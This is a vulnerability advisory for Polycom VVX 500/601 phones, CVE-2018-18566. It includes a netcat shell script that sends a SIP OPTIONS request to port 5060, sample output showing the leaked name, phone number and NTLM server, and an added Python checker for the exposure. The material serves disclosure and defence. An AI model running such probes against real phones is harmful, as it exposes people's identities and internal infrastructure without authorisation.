Polycom VVX 500 / VVX 601 5.8.0.12848 Information Exposure Vulnerability

25 Oct 2018 | Reported by Micha Borrmann | Type: zdt | Source: 0day.today

Product:                   VVX 500 / VVX 601
Manufacturer:              Polycom
Affected Version(s):       <= 5.8.0.12848
Tested Version(s):         5.4.0.10182, 5.8.0.12848
Vulnerability Type:        Information Exposure (CWE-200)
Risk Level:                Low
Solution Status:           Open
Manufacturer Notification: 2018-08-29
Solution Date:             20??-??-??
Public Disclosure:         2018-10-23
CVE Reference:             CVE-2018-18566
Authors of Advisory:       Micha Borrmann (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

If a Polycom VVX 500/601 [1] is used with an on-premise installation
with Skype for Business, the phone leaks the configured phone number
and the name to unauthorized clients via SIP.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The phone has a SIP service running by default on TCP port 5060. This
service can be abused to leak information about the configuration of
the phone.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Script getdatafrompolycom.sh

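#!/bin/sh
# Micha Borrmann <[email protected]>

# Address of the host running the script; used in the Via and To headers
OWNIP=192.168.100.102

if [ -z "$1" ]
then
    echo "Please enter an IPv4 address as target"
    exit 1
else
    TARGET=$1
fi

# Send a SIP OPTIONS request to the SIP service on TCP port 5060.
# "recode ..ibmpc" converts the line endings to CRLF, as SIP expects.
echo 'OPTIONS sip:dummy SIP/2.0
Via: SIP/2.0/TCP '"$OWNIP"':5060
To: <sip:'"$OWNIP"':5060>
From: <sip:127.0.0.1:5060>
Call-ID: 1
CSeq: 1 OPTIONS
Contact: <sip:127.0.0.1:5060>
Accept: application/sdp
Content-Length: 0
' | recode ..ibmpc | netcat -w 1 "$TARGET" 5060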

Start the script against a phone and see the result:

$ ./getdatafrompolycom.sh 192.168.100.101
SIP/2.0 200 OK
Via: SIP/2.0/TCP 192.168.100.102:5060
From: <sip:127.0.0.1:5060>
To: "Micha Borrmann" <sip:192.168.100.102:5060>;tag=F75D6627-FE135FAE
CSeq: 1 OPTIONS
Call-ID: 1
Contact: <sip:[email protected];opaque=user:epid:XYZ...;abcd>
Allow: INVITE,ACK,BYE,CANCEL,OPTIONS,INFO,MESSAGE,SUBSCRIBE,NOTIFY,PRACK,UPDATE,REFER
Supported: replaces,100rel
User-Agent: Polycom/5.8.0.12848 PolycomVVX-VVX_601-UA/5.8.0.12848
Accept-Language: en
P-Preferred-Identity: "Micha Borrmann" <sip:[email protected]>,<tel:+49XYZ334455661234;ext=1234>
Accept: application/sdp,text/plain,message/sipfrag,application/dialog-info+xml
Accept-Encoding: identity
Supported: 100rel,replaces,norefersub,sdp-anat
Authorization: NTLM qop="auth", realm="SIP Communications Service", opaque="1234CAFE", crand="cafe1234", cnum="11", targetname="server.example.com", response="0000000000000000000000000001"
Content-Length: 0
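
A defender-side check for the exposure shown above, as an added example that is not part of the SySS advisory: it parses a captured SIP response and lists the identity and infrastructure values it discloses, so a phone can be re-checked after a firmware update or after the SIP service has been disabled. The function names and the sample response are constructed for illustration.

```python
import re

# Response headers that carry the configured identity in the output above.
IDENTITY_HEADERS = ("to", "contact", "p-preferred-identity")

# Constructed sample modelled on the response above; all values are placeholders.
SAMPLE_RESPONSE = (
    "SIP/2.0 200 OK\r\n"
    "From: <sip:127.0.0.1:5060>\r\n"
    'To: "Jane Doe" <sip:192.0.2.10:5060>;tag=AAAA-BBBB\r\n'
    "Contact: <sip:jane.doe@example.com;opaque=user:epid:XYZ;gruu>\r\n"
    "User-Agent: Polycom/5.8.0.12848 PolycomVVX-VVX_601-UA/5.8.0.12848\r\n"
    'P-Preferred-Identity: "Jane Doe" <sip:jane.doe@example.com>,'
    "<tel:+15550100;ext=1234>\r\n"
    'Authorization: NTLM realm="SIP Communications Service", '
    'targetname="server.example.com"\r\n'
    "Content-Length: 0\r\n\r\n"
)

def parse_headers(raw):
    """Return [(lowercased name, value)] from a raw SIP response."""
    lines = raw.replace("\r\n", "\n").split("\n\n", 1)[0].split("\n")
    if not re.match(r"SIP/2\.0 \d{3}\b", lines[0]):
        raise ValueError("not a SIP response")
    headers = []
    for line in lines[1:]:
        if line[:1] in (" ", "\t") and headers:  # folded continuation line
            headers[-1] = (headers[-1][0], headers[-1][1] + " " + line.strip())
        elif ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip().lower(), value.strip()))
    return headers

def find_exposures(raw):
    """Map finding type -> sorted values disclosed by the response."""
    found = {}
    for name, value in parse_headers(raw):
        hits = {}
        if name in IDENTITY_HEADERS:
            hits = {"display_name": re.findall(r'"([^"]+)"\s*<', value),
                    "sip_uri": re.findall(r"<sips?:([^@>;]+@[^>;]+)", value),
                    "tel_uri": re.findall(r"<tel:([^>;]+)", value)}
        elif name == "user-agent":
            hits = {"user_agent": [value]}
        elif name == "authorization":
            hits = {"auth_target": re.findall(r'targetname="([^"]+)"', value)}
        for kind, values in hits.items():
            found.setdefault(kind, set()).update(values)
    return {kind: sorted(vals) for kind, vals in found.items() if vals}
```

A response whose To header only echoes the requester's address, with no display name, user URI or tel URI, yields no identity findings.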

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Install the new firmware which has disabled the SIP service by default.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2018-08-13: Detection of the vulnerability
2018-08-29: Vulnerability reported to manufacturer
2018-10-22: CVE number assigned
2018-10-23: Public release of the security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:
[1] Product web sites for the phones
    https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx500.html
    https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx601.html
[2] SySS Security Advisory SYSS-2018-028
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-028.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy/
